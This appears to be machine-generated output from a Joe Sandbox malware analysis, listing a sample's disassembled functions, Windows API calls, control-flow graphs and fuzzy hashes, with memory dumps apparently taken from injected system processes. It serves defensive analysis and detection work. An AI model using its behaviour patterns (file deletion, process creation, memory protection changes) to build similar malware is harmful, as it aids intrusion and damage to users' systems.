                                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                                          • Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
                                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02382A01 Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 871 2382a01-2382a3e call 2383677 lstrcat call 2382525 call 2382a38 call 2383677 lstrcat 881 2382a44-2382a67 call 2382b71 call 238351b 871->881 885 2382a6c-2382a73 881->885 885->881 886 2382a75-2382a91 call 2383463 call 23826a7 885->886 891 2382abe-2382ad5 call 23826a7 886->891 892 2382a93 886->892 897 2382b02-2382b19 call 23826a7 891->897 898 2382ad7 891->898 892->891 894 2382a95-2382aaa call 238271d 892->894 894->891 900 2382aac 894->900 907 2382b1b 897->907 908 2382b1c-2382b35 call 2382ebb 897->908 898->897 901 2382ad9-2382aee call 238271d 898->901 900->891 903 2382aae-2382ab8 DeleteFileA 900->903 901->897 910 2382af0 901->910 903->891 907->908 913 2382b58-2382b6c Sleep 908->913 914 2382b37-2382b40 call 238307b 908->914 910->897 912 2382af2-2382afc DeleteFileA 910->912 912->897 913->885 914->913 917 2382b42-2382b52 DeleteFileA 914->917 917->913
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023829F8), ref: 02382A07
                                                                                                                                                                                            • Part of subcall function 02382A38: lstrcat.KERNEL32(00000000,02382A2F), ref: 02382A3E
                                                                                                                                                                                            • Part of subcall function 02382A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AB8
                                                                                                                                                                                            • Part of subcall function 02382A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AFC
                                                                                                                                                                                            • Part of subcall function 02382A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02382B52
                                                                                                                                                                                            • Part of subcall function 02382A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02382B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction ID: 83424610e692b2d037c930f79a1cefa8ad4d8da49885999eb03c8428f41b7843
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91412F71501398AEDB227F708D48EAF76BDEF40709F4044A6AE85EE051EE349680CEA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C29DD Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 824 1c29dd-1c2a1a call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 834 1c2a20-1c2a43 call 1c2b4d call 1c34f7 824->834 838 1c2a48-1c2a4f 834->838 838->834 839 1c2a51-1c2a6d call 1c343f call 1c2683 838->839 844 1c2a6f 839->844 845 1c2a9a-1c2ab1 call 1c2683 839->845 844->845 847 1c2a71-1c2a86 call 1c26f9 844->847 850 1c2ade-1c2af5 call 1c2683 845->850 851 1c2ab3 845->851 847->845 855 1c2a88 847->855 860 1c2af8-1c2b11 call 1c2e97 850->860 861 1c2af7 850->861 851->850 853 1c2ab5-1c2aca call 1c26f9 851->853 853->850 862 1c2acc 853->862 855->845 856 1c2a8a-1c2a94 DeleteFileA 855->856 856->845 866 1c2b34-1c2b48 Sleep 860->866 867 1c2b13-1c2b1c call 1c3057 860->867 861->860 862->850 865 1c2ace-1c2ad8 DeleteFileA 862->865 865->850 866->838 867->866 870 1c2b1e-1c2b2e DeleteFileA 867->870 870->866
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                                            • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                                            • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02382A38 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02382A2F), ref: 02382A3E
                                                                                                                                                                                            • Part of subcall function 02382B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02382C68
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AB8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02382B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02382B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction ID: fe263bc7a84a6d6a594af912e0c7f71bf844388ecdf61baf805f1d3ca3a95e6e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E312171501398AEDB227F708D48FAF76BCEF40709F4044A5AE45EE054EF349680CEA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C2A14 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                                            • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023831EA Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0238320E
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 0238324C
                                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,023831D9,00000011,?,00000000,00000000), ref: 02383279
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,023831D9,00000011,?,00000000,00000000,00000000,02383092,00000004,00000000), ref: 02383285
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,023831D9,00000011,?,00000000,00000000,00000000,02383092,00000004,00000000), ref: 02383291
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction ID: 38e9d5191e40b758f6cd9b11f0f3b4c4e106086092a3913515b68449a960020b
                                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction Fuzzy Hash: 881124724006589FDF127B60CC88E9FB7FDEF40705F0145A5E986EB105DB305A80CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C31C6 Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
                                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
                                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C0B65 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 273847653-0
                                                                                                                                                                                          • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                                          • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02383F31 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02383F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02383F51
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,02383F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02383F6F
                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 02383F7F
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 02383F8F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                                          • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                                          • Instruction ID: 64570113946bd3aed67f811deb3fb261c303ffdea24c6e977f0c63488a63663c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FF01C705453509AFF603BB08C4C74A3AB9AF40B04F0400D0AE89AE696CF7480508EB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C3EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                                          • String ID: j
                                                                                                                                                                                          • API String ID: 4133054770-2747090070
                                                                                                                                                                                          • Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                                          • Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:4.9%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:70
                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                          execution_graph 2692 ab0b6b 2694 ab0b7d 2692->2694 2693 ab08b3 GetPEB 2695 ab0bb1 2693->2695 2694->2693 2696 ab0c3f GetPEB 2695->2696 2697 ab0bb6 2696->2697 2610 ab08d9 2616 ab0cc4 2610->2616 2612 ab08e5 2619 ab0643 2612->2619 2614 ab08ef 2627 ab093e 2614->2627 2634 ab0c3f GetPEB 2616->2634 2618 ab0cc9 2618->2612 2620 ab0660 2619->2620 2636 ab067c 2620->2636 2622 ab0673 2642 ab06c2 2622->2642 2624 ab080f 2624->2614 2625 ab06b9 2625->2624 2646 ab0811 2625->2646 2628 ab0cc4 GetPEB 2627->2628 2630 ab094a 2628->2630 2629 ab0af1 2629->2614 2630->2629 2666 ab09d9 2630->2666 2632 ab09d2 2632->2629 2670 ab0af3 2632->2670 2635 ab0c4b 2634->2635 2635->2618 2635->2635 2637 ab0681 2636->2637 2638 ab06c2 GetPEB 2637->2638 2640 ab06b9 2638->2640 2639 ab080f 2639->2622 2640->2639 2641 ab0811 GetPEB 2640->2641 2641->2639 2644 ab06c7 2642->2644 2643 ab080f 2643->2625 2644->2643 2645 ab0811 GetPEB 2644->2645 2645->2643 2657 ab086e 2646->2657 2648 ab0840 2650 ab08d9 2648->2650 2651 ab0866 2648->2651 2652 ab0cc4 GetPEB 2650->2652 2651->2624 2660 ab08d9 2651->2660 2653 ab08e5 2652->2653 2654 ab0643 GetPEB 2653->2654 2655 ab08ef 2654->2655 2656 ab093e GetPEB 2655->2656 2656->2655 2658 ab0873 2657->2658 2658->2648 2659 ab08d9 GetPEB 2658->2659 2659->2658 2661 ab0cc4 GetPEB 2660->2661 2662 ab08e5 2661->2662 2663 ab0643 GetPEB 2662->2663 2664 ab08ef 2663->2664 2665 ab093e GetPEB 2664->2665 2665->2664 2669 ab09de 2666->2669 2667 ab0af3 GetPEB 2668 ab0af1 2667->2668 2668->2632 2669->2667 2669->2668 2672 ab0b01 2670->2672 2673 ab0cc4 GetPEB 2672->2673 2674 ab0b0d 2673->2674 2679 ab0b27 2674->2679 2676 ab0b20 2678 ab0b57 2676->2678 2683 ab0b65 2676->2683 2680 ab0b2c 2679->2680 2681 ab0b65 GetPEB 2680->2681 2682 ab0b57 2681->2682 2682->2676 2684 ab0b6a 2683->2684 2689 ab08b3 2684->2689 2690 ab08b9 2689->2690 2691 ab08d9 GetPEB 2690->2691 2691->2690

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00AB0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.2887613195.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_ab0000_RuntimeBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: a746e57cf6378d43ca32d6e26f47fe512de4d0868098c976c8f9b264cff3b5ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B31C8724102046FEB017FB09E46EFB3BACEF11310F440165BD85DA0A7EA744A658AB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00291D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2887408520.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_290000_smartscreen.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction ID: 5cfeb1bcbae8c558e98dcdee69f702b75d149b9acfc2b5526b48693fa100539d
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction Fuzzy Hash: F421F730B34C1E0BEF58A67D9859764F6D2E79C320F980295E90DD36E8ED58CC9187C6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00290811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2887408520.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_290000_smartscreen.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: c058b29fad30e67ee3f8ad258c7953d0322cd43e49dbed41448cb6062d2459d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31E872520209BFEF017F709D86ABA77ACFF11300F400165BD85DA0A6DA744D74CAB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 023A0005 Relevance: 2.6, APIs: 1, Instructions: 1116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 023A098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 023A09A5
                                                                                                                                                                                            • Part of subcall function 023A098B: GetStartupInfoA.KERNEL32(00000000), ref: 023A09BD
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 023A001D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 213680645-0
                                                                                                                                                                                          • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                                          • Instruction ID: c7d53725e21010ff9c758411df96f51dcf8c62d1367791f143406d9d7b080951
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1472F06141E3C05FD72F9B644A79BA67F79FF03208B0D10EBD481DA0B3D6289909C76A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 021F0000 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 395memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
